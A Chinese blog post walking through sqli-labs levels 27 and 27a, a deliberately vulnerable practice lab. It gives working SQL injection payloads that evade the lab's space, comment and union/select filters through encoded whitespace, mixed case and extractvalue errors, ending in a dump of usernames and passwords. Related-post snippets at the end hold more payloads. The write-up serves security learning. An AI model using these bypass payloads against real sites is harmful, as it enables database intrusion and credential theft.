(手工)【sqli-labs27、27a】报错回显、布尔盲注、过滤后注入

已于 2022-07-14 19:03:08 修改
阅读量932 收藏 6
点赞数 1
分类专栏: # 【全】sqlil-abs靶场 文章标签: web安全 数据库
于 2022-07-13 16:45:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/125764687
版权

目录

推荐:

一、(手工)SQL注入基本步骤:

二、Less27(GET-Error based - All your UNION & SELECT belong to us-string single quote)

2.1、简介:(过滤-报错回显-单引号)

2.2、第一步:注入点测试

 2.3、第二步:分析过滤

2.4、第三步:判断字段数

2.5、第四步:暴库

2.6、第五步:爆表名

2.7、第六步:爆字段

2.8、第七步:爆数据

三、Less27a(GET-Blind based - All your UNION & SELECT belong to us Double quote )

3.1、简介:(过滤-布尔盲注-双引号)

3.2、特点:

3.3、利用过程:

推荐:

【SQL注入-无回显】布尔盲注:原理、函数、利用过程https://blog.csdn.net/qq_53079406/article/details/125275974?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165770191616781818723356%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165770191616781818723356&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-125275974-null-null.185%5Ev2%5Econtrol&utm_term=%E5%B8%83%E5%B0%94&spm=1018.2226.3001.4450

【SQL注入】数字型注入 & 字符型注入https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/125741101?spm=1001.2014.3001.5501

【WAF绕过】SQL注入、文件上传、XSShttps://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450icon-default.png?t=M666https://blog.csdn.net/qq_53079406/article/details/124882861?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165759520116782390512182%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=165759520116782390512182&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-124882861-null-null.185%5Ev2%5Econtrol&utm_term=SQL%E7%BB%95%E8%BF%87&spm=1018.2226.3001.4450

一、(手工)SQL注入基本步骤:

第一步:注入点测试

第二步:分析权限

第三步:判断字段数

第四步:爆数据库名

第五步:爆表名

第六步:爆字段名

第七步:爆数据

二、Less27(GET-Error based - All your UNION & SELECT belong to us-string single quote)

2.1、简介:(过滤-报错回显-单引号)

请求方法:GET

方法:过滤替换: /* , – , # , 空格 , /、union、select、UNION、SELECT、Union、Select+报错回显

2.2、第一步:注入点测试

输入?id=1

 后面加上单引号发现报错了

说明是单引号闭合,即是字符型注入

且可利用报错回显

 2.3、第二步:分析过滤

方法一:

考虑一步一步将注入语句字符一个一个替换掉,直到不报错(浪费时间)

或者全部替换(如果报错,不知道哪里被过滤了)

方法二:

获取源码进行白盒审计(最优)

方法三:

eg:输入id=union(重要的都输进去)

看输入回显过滤语句的情况

最后可以知道被过滤的字符有

 /* , – , # , 空格 , /,/s

union、select、UNION、SELECT、Union、Select

替代空格:

%09  TAB 键(水平)

%0a  新建一行

%0c  新的一页

%0d  return 功能

%0b  TAB 键(垂直)

%a0  空格

空格换成 ||

注释被过滤掉了,就可以使用拼接进语句,将2侧进行闭合

union和select可以使用大小写混淆绕过,或者双写

2.4、第三步:判断字段数

2.5、第四步:暴库

?id=1'%26%26extractvalue(1, concat(0x7e, database()))%26%26'1

 或者

?id=0'unIon%0BSelEcT%0B1,database(),3||'1

2.6、第五步:爆表名

?id=0'%0AunIon%0ASeLeCt%0A1,(SeLeCt%0Agroup_concat(table_name)%0Afrom%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'),3||'1

 或者

?id=0'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())))||'

2.7、第六步:爆字段

?id=0'%0buniOn%0bsElEct%0b1,(group_concat(column_name)),3%0bfrom%0binformation_schema.columns%0bwhere%0btable_schema='security'%0bAnd%0btable_name='users'%0b%26%26%0b'1'='1

或者

?id=1'||extractvalue(1,concat(0x7e,(sEleCt(group_concat(column_name))from(information_schema.columns)where(table_schema)=(database())and(table_name)='users')))||'

2.8、第七步:爆数据

?id=1'||extractvalue(1,concat(0x7e,(sEleCt(substr((group_concat(username,password)),1,32))from(users))))||'

或者

 ?id=0'/*%0a*/UnIoN/*%0a*/SeLeCt/*%0a*/1,(SeLeCt/*%0a*/group_concat(concat_ws('$',id,username,password))/*%0a*/from/*%0a*/users),3/*%0a*/||/*%0a*/'1'='1

三、Less27a(GET-Blind based - All your UNION & SELECT belong to us Double quote )

3.1、简介:(过滤-布尔盲注-双引号)

请求方法:GET

方法:过滤替换: /* , – , # , 空格 , /、union、select、UNION、SELECT、Union、Select+布尔盲注

3.2、特点:

双引号字符型注入,可以使用union联合注入

无错误回显(即不能报错注入updatexml函数等)

正确和错误页面不同,可以进行布尔盲注,因为他有无错误回显

也可延时盲注

3.3、利用过程:

基本上和Less26使用联合查询一样

进行布尔盲注(判断)

?id=0"unIon%0BSelEcT%0B1,database(),"3

…… 

黑色地带(崛起)
关注
专栏目录
墨者-SQL注入漏洞测试(报错盲注)
wh1sper、的博客
07-04 834
墨者-SQL注入漏洞测试前言一、sqlmap二、手注1.报错注入2.时间注入3.联合查询union被过滤总结 前言 本题为墨者学院在线靶场 进入题目发现是个登录界面,找了好久,最后在关于平台停机维护的通知的页面找到了注入点 判断注入类型,当输入?id=1’ and 1=1 %23时,页面显示正常。 ?id=1' and 1=1 %23 当输入?id=1’ and 1=2 %23时,页面显示不正常。 由此判断注入类型为单字符注入。 一、sqlmap 首先先清理sqlmap的缓存。 python sq
sqli-labs注入——sqli-labs的1-65关闯关指南
qq_51366383的博客
01-27 1758
sqli-labs图片上一共有75关,但是下载的资料都只有65关,所以只写了65关,本文仅是个人想法,如有不对请多谅解。 前面三部分的数据为:security 1、Emails Id ,email_id 2、referers 3、Uagents id,uagent,ip_address,username 4、Users id,username,password password:Dumb,I-kill-you,p@ssword,crappy,stupidity,genious,mob!le,admin,
sqli-labs(27)
weixin_30901729的博客
05-28 458
0X01 先查询闭合 ?id=1' 报错 ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注_sqli-labs第27a
最新发布
2401_86951372的博客
09-12 565
确定第一个字符的内容后,再按照此方法判断其余字符,为了提高效率,稍后使用脚本去枚举。确定第一个字符的内容后,再按照此方法判断其他字符,为了节省时间,稍后使用脚本枚举。字符的ASCLL码肯定大于1,所以页面正常显示,确定payload可用;字符的ASCLL码肯定大于1,所以页面延时5秒,确定payload可用;库名肯定大于1,所以页面正常显示,确定payload可用;库名长度肯定大于1,页面延时5秒,确定payload可用;id=1"and"0,页面异常(空)显示。id=1"and"1,页面正常显示。
sqli-labs(27a)
weixin_30438813的博客
05-28 244
0X01测试闭合 ?id=1" 报错 ?id=1"" 正常 0X02构造语句爆数据库名称 ?id=99"%0AUNIon%0ASELECt%0A1,database(),3||"1"="1 和27关一样 只是 ’ 变成了 ” 其他语法就是打组合拳 0X03组合拳 27关见 PS 学习之路 少就是多 慢就是快 转载于:https://...
sqlilabs-27a
KAKA的博客
07-14 413
又是盲注,只需要把 26a 关卡 payload 改改就可以用了,这一关把报错信息给过滤了,所以报错注入用不了: –查表 http://sqlilabs/Less-27a/?id=1"and(if(ascii(substr((SeLect(table_name)from(SeLect(table_name),(table_rows)from(information_schema.tables)where(table_schema=database())and(table_rows=14))a),1,1))
SQL-labs的第27关——union和select被屏蔽 报错注入(Get)
qq_73393033的博客
08-04 500
注意:该关的空格、注释也被屏蔽了。
CTFshow-sqli-labs
Leo8283的博客
04-20 758
CTFshow sql-labs刷题记录 1-4 分别用’、"、’)、")闭合,通过联合查询语句union获取flag。由于当前调用的库非存放flag的库,可以用手注,通过元数据库information_schema.schemata表(查找所有库名),information_schema.tables表(查找所有表名),information_schema.columns表查找列名,获取flag最终的位置。 查询所有数据库 union select 1,group_concat(schema_name),
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
m0_54899775的博客
12-25 1372
sqli-labs Less-26、26a、2727a、28、28a(sqli-labs闯关指南 26、26a、2727a、28、28a)—Advanced injection
sqli-labs-php7环境搭建及通关记录
weixin_44644249的博客
10-28 1817
sqli-labs-php7环境搭建及通关记录 sqli-labs-php7环境搭建及通关记录 学了一个星期的sql注入,将学习过程记录在博客,以后可以查看。 学习视频来自b站的up主:crowsec 视频链接:https://space.bilibili.com/29903122 sqli-labs-php7链接:https://github.com/skyblueee/sqli-labs-php7.git 一. 环境搭建及常用工具 Linux环境搭建(我这里用的是kali linux): 1.启动
sqli-labs通关笔记
怪味巧克力的博客
05-19 443
文章目录Basic InjectionsLess-1 '字符型注入-联合查询Less-2 布尔注入-联合查询Less-3 字符注入-联合查询Less-4 字符注入-联合查询Less-5 字符注入-报错查询Less-6 字符注入-错误回显Less-7 文件读写Less-8 盲注和文件读写Less-9 盲注Less-10 盲注Less-11 单引号POST注入Less-12 双引号POST注入Less-13 双注入 - 字符型 - 变形Less-14 双注入 - 双引号 - 字符串Less-15 盲注/布尔
SQLi LABS Less 23 联合注入+报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十三关,SQLi-LABS Less-23,SQLi-LABS Less 23,SQLiLABS Less23,SQLi Less 23
sqli-labs第27关,27a
weixin_46023655的博客
07-30 586
sqli-labs第2727a
Sqlilabs-27
KAKA的博客
07-14 842
题目告诉我们本关卡过滤了 union 和 select,其实还有空格,这一关也过滤了 尝试双写绕过,不行 那就大小写绕过,成功 –查表 http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1 –查列 http://s.
sqli-labs/Less-27
m0_71299382的博客
11-20 417
sqli-labs第二十七关
SQLi Labs Lesson27 & Lesson27a
1ame的博客
08-23 453
Lesson - 27 GET - Error Based - All your UNION & SELECT Belong to us - String - Single Quotes 首先进入欢迎界面: 构造 ?id=1,结果如图所示: 构造 ?id=1',结果如图所示: 由错误回显信息推测后台SQL语句结构: select ...
sqlilabs less-27~27a
TA不懒,但还没有添加简介
07-20 317
sqlilabs less-27~27a
sqli-labs(23-27a)
qq_43579362的博客
02-12 596
Less-23 1.打开页面正常操作,http://127.0.0.1/sqlilabs/Less-23/?id=1,页面回显正常 2.加单引号,回显错误,根据错误提示可知闭合方式'--+/'#,但是两者输入后页面还是报错, 3.可能存在对--和#的过滤,所以尝试构造1'or'1'='1,回显正常,说明闭合成功,可以开始注入,这里可以采用updatexml()报错注入 Less-24 二次注...
sqli-labs27a
06-07
Sqli-Labs是一个著名的渗透测试(Penetration Testing)练习平台,它提供了一系列SQL注入SQL Injection)的挑战题目,通常用于网络安全培训和学习者提升对SQL注入漏洞防御能力的实践。27ASqli-Labs中的一个具体任务,这个编号代表该挑战的难度等级,每个任务会逐渐递增,让你逐步理解和应对更复杂的SQL注入场景。 在Sqli-Labs27a中,你可能会遇到一个需要利用SQL注入技术来访问数据库、绕过权限控制或获取特定信息的情景。解决这类问题通常需要了解如何构造合适的SQL查询,利用注释、动态参数等方法来避开输入验证,并观察返回结果来推断下一步的行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值